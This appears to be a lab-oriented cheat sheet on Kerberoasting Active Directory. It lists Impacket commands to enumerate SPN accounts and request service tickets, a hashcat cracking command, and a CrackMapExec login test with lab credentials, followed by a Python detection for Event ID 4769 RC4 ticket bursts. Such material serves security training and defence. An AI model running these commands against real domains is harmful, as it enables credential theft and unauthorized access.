<aside> 💡
A prerequisite to performing Kerberoasting attacks is either domain user credentials (cleartext, or just an NTLM hash if using Impacket), a shell in the context of a domain user, or an account such as SYSTEM. Once we have this level of access, we can start. We must also know which host in the domain is a Domain Controller so we can query it.
</aside>
# Installing Tools

```bash
git clone https://github.com/SecureAuthCorp/impacket
cd impacket   # pip installs from the current directory, so enter the clone first
sudo python3 -m pip install .
GetUserSPNs.py -h
```

# Listing SPN Accounts

```bash
# Impacket target syntax is domain/user:password; -dc-ip is the Domain Controller to query
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend:Klmcargo2
```

# Requesting all TGS Tickets

```bash
# Without a password in the target string, Impacket prompts for it
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request
```

# Requesting a Single TGS ticket

```bash
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev
```

# Saving the TGS Ticket to an Output File

```bash
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs
```

# Cracking the Ticket Offline with Hashcat

```bash
# Mode 13100 is Kerberos 5 TGS-REP etype 23 (RC4), the format GetUserSPNs.py writes
hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt
```

# Testing Authentication against a Domain Controller

```bash
# Quote the password so the shell does not interpret special characters
sudo crackmapexec smb 172.16.5.5 -u sqldev -p 'database!'
```
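The `-request` step above makes one TGS request per SPN account, and the tickets that hashcat mode 13100 cracks are the RC4-encrypted ones (TicketEncryptionType 0x17), so on the Domain Controller this shows up as a burst of Event ID 4769 entries with that encryption type from a single client. The detection below is an added example, not part of the original notes: it runs over constructed, simplified 4769 lines (real events are EVTX/XML with more fields), and the source IP 172.16.5.225 and all account names other than `forend` and `sqldev` are invented.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real DC logs): one-line rendering of Windows Event ID
# 4769 "A Kerberos service ticket was requested". The first five lines model a
# `GetUserSPNs.py -request` run as seen by the DC: one user pulling RC4 (0x17) tickets
# for many SPN accounts within seconds. The last two lines are ordinary traffic.
SAMPLE_4769 = """\
2024-05-01T10:00:01 EventID=4769 TargetUserName=forend@INLANEFREIGHT.LOCAL ServiceName=sqldev IpAddress=172.16.5.225 TicketEncryptionType=0x17
2024-05-01T10:00:01 EventID=4769 TargetUserName=forend@INLANEFREIGHT.LOCAL ServiceName=backupjob IpAddress=172.16.5.225 TicketEncryptionType=0x17
2024-05-01T10:00:02 EventID=4769 TargetUserName=forend@INLANEFREIGHT.LOCAL ServiceName=svc_sql IpAddress=172.16.5.225 TicketEncryptionType=0x17
2024-05-01T10:00:02 EventID=4769 TargetUserName=forend@INLANEFREIGHT.LOCAL ServiceName=krbtgt IpAddress=172.16.5.225 TicketEncryptionType=0x17
2024-05-01T10:00:03 EventID=4769 TargetUserName=forend@INLANEFREIGHT.LOCAL ServiceName=svc_web IpAddress=172.16.5.225 TicketEncryptionType=0x17
2024-05-01T10:02:10 EventID=4769 TargetUserName=alice@INLANEFREIGHT.LOCAL ServiceName=WS01$ IpAddress=172.16.5.30 TicketEncryptionType=0x17
2024-05-01T10:02:11 EventID=4769 TargetUserName=alice@INLANEFREIGHT.LOCAL ServiceName=sqldev IpAddress=172.16.5.30 TicketEncryptionType=0x12
"""


def parse_event(line):
    """Turn one sample line into a dict; the timestamp is stored under 'ts'."""
    ts, *fields = line.split()
    event = dict(f.split("=", 1) for f in fields)
    event["ts"] = datetime.fromisoformat(ts)
    return event


def kerberoast_alerts(log, window=timedelta(minutes=5), threshold=3):
    """Map (requesting user, source IP) -> sorted distinct SPN accounts for any requester
    that obtained RC4 service tickets for >= threshold distinct user accounts inside
    `window`. Machine accounts ($) and krbtgt are normal traffic and are ignored."""
    by_requester = defaultdict(list)
    for line in log.splitlines():
        ev = parse_event(line)
        svc = ev["ServiceName"]
        if ev["EventID"] != "4769" or ev["TicketEncryptionType"] != "0x17":
            continue
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        by_requester[(ev["TargetUserName"], ev["IpAddress"])].append((ev["ts"], svc))

    alerts = {}
    for key, reqs in by_requester.items():
        reqs.sort()  # sliding window over chronologically ordered requests
        for i, (start, _) in enumerate(reqs):
            in_window = {svc for ts, svc in reqs[i:] if ts - start <= window}
            if len(in_window) >= threshold:
                alerts[key] = sorted(in_window)
                break
    return alerts
```

The encryption-type filter is the highest-signal rule here; a second, etype-agnostic threshold on distinct service accounts per requester is worth keeping alongside it, tuned against your own baseline.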